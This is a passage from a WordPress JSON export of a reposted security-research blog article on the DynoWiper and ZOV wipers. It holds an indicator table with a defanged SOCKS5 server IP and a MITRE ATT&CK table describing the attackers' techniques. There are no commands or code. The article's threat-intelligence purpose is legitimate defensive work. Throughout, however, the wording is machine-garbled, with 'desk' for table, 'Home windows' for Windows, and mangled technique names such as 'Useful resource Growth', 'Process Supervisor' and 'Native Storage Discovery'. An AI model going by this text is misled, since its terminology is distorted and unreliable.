cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"124\"><strong>IP<\/strong><\/td>\n<td width=\"124\"><strong>Area<\/strong><\/td>\n<td width=\"124\"><strong>Internet hosting\u00a0supplier<\/strong><\/td>\n<td width=\"124\"><strong>First seen<\/strong><\/td>\n<td width=\"124\"><strong>Particulars<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"124\"><span style=\"font-family: courier new, courier, monospace;\">31.172.71[.]5<\/span><\/td>\n<td width=\"124\">N\/A<\/td>\n<td width=\"124\">Fornex Internet hosting S.L.<\/td>\n<td width=\"124\">2024-10-27<\/td>\n<td width=\"124\">SOCKS5 server.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>MITRE ATT&amp;CK strategies<\/h2>\n<p>This desk was constructed utilizing <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/resources\/versions\/\">model 18<\/a> of the MITRE ATT&amp;CK framework<strong>.<\/strong><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"113\"><strong>Tactic<\/strong><\/td>\n<td width=\"113\"><strong>ID<\/strong><\/td>\n<td width=\"151\"><strong>Title<\/strong><\/td>\n<td width=\"265\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"113\"><strong>Useful resource Growth<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1584\/004\/\" target=\"_blank\" rel=\"noopener\">T1584.004<\/a><\/td>\n<td width=\"151\">Compromise Infrastructure: Server<\/td>\n<td width=\"265\">A possible compromised server was used to host a SOCKS5 server.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\" width=\"113\"><strong>Execution<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1059\/001\" target=\"_blank\" rel=\"noopener\">T1059.001<\/a><\/td>\n<td width=\"151\">Command and Scripting Interpreter: PowerShell<\/td>\n<td width=\"265\">Sandworm used PowerShell scripts for deployment within the goal organizations.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1059\/003\" target=\"_blank\" rel=\"noopener\">T1059.003<\/a><\/td>\n<td width=\"151\">Command and Scripting Interpreter: Home windows Command Shell<\/td>\n<td width=\"265\">The ZOV wiper runs a shell command by way of <span style=\"font-family: courier new, courier, monospace;\">cmd.exe<\/span> to collect info, take away information and directories, and schedule a system reboot.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1053\/005\" target=\"_blank\" rel=\"noopener\">T1053.005<\/a><\/td>\n<td width=\"151\">Scheduled Process\/Job: Scheduled Process<\/td>\n<td width=\"265\">The ZOV wiper and DynoWiper are executed utilizing Home windows scheduled duties.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Credential Entry<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1003\/001\/\" target=\"_blank\" rel=\"noopener\">T1003.001<\/a><\/td>\n<td width=\"151\">OS Credential Dumping: LSASS Reminiscence<\/td>\n<td width=\"265\">The attackers tried to dump LSASS course of reminiscence utilizing Home windows Process Supervisor.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"4\" width=\"113\"><strong>Discovery<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1083\" target=\"_blank\" rel=\"noopener\">T1083<\/a><\/td>\n<td width=\"151\">File and Listing Discovery<\/td>\n<td width=\"265\">The ZOV wiper and DynoWiper seek for information and directories so as to wipe them.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1680\/\" target=\"_blank\" rel=\"noopener\">T1680<\/a><\/td>\n<td width=\"151\">Native Storage Discovery<\/td>\n<td width=\"265\">The ZOV wiper and DynoWiper establish extra disks current on the system to subsequently wipe information on them.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1082\" target=\"_blank\" rel=\"noopener\">T1082<\/a><\/td>\n<td width=\"151\">System Data Discovery<\/td>\n<td width=\"265\">The ZOV wiper prints the Home windows model of the working system.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1124\" target=\"_blank\" rel=\"noopener\">T1124<\/a><\/td>\n<td width=\"151\">System Time Discovery<\/td>\n<td width=\"265\">The ZOV wiper prints present native time.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\" width=\"113\"><strong>Command and Management<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1105\/\" target=\"_blank\" rel=\"noopener\">T1105<\/a><\/td>\n<td width=\"151\">Ingress Instrument Switch<\/td>\n<td width=\"265\">The attackers tried to obtain Rubeus and rsocx within the goal group.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/techniques\/T1090\/002\/\" target=\"_blank\" rel=\"noopener\">T1090.002<\/a><\/td>\n<td width=\"151\">Proxy: Exterior Proxy<\/td>\n<td width=\"265\">The attackers tried to create a reference to an exterior proxy utilizing rsocx.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"2\" width=\"113\"><strong>Affect<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1561\/001\" target=\"_blank\" rel=\"noopener\">T1561.001<\/a><\/td>\n<td width=\"151\">Disk Wipe: Disk Content material Wipe<\/td>\n<td width=\"265\">The ZOV wiper and DynoWiper overwrite contents of information.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v18\/techniques\/T1529\" target=\"_blank\" rel=\"noopener\">T1529<\/a><\/td>\n<td width=\"151\">System Shutdown\/Reboot<\/td>\n<td width=\"265\">The ZOV wiper and DynoWiper reboot the system after the wiping course of is full.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=dynowiper-update-technical-analysis-attribution&amp;sfdccampaignid=7011n0000017htTAAQ\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/eti-eset-threat-intelligence.png\" alt=\"\" width=\"915\" height=\"296\"\/><\/a><\/p>\n<\/div>\n<p><template id="QigMHkF6SfIHgS74sB8y"></template><\/script><br \/>\n<br \/><\/p>\n","protected":false},"excerpt":{"rendered":"<p>On this weblog submit, we offer extra technical particulars associated to our earlier DynoWiper publication. Key factors of the report: ESET researchers recognized new data-wiping malware that we have now named DynoWiper, used in opposition to an power firm in Poland. The techniques, strategies, and procedures (TTPs) noticed through the DynoWiper incident carefully resemble these [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":11360,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[58],"tags":[1455,4404,7646,3027,133],"class_list":["post-11358","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","tag-analysis","tag-attribution","tag-dynowiper","tag-technical","tag-update"],"_links":{"self":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/11358","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11358"}],"version-history":[{"count":1,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/11358\/revisions"}],"predecessor-version":[{"id":11359,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/11358\/revisions\/11359"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/media\/11360"}],"wp:attachment":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11358"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=11358"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=11358"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<!-- This website is optimized by Airlift. Learn more: https://airlift.net. Template:. Learn more: https://airlift.net. Template: 69d9690a190636c2e0989534. Config Timestamp: 2026-04-10 21:18:02 UTC, Cached Timestamp: 2026-05-06 18:33:12 UTC -->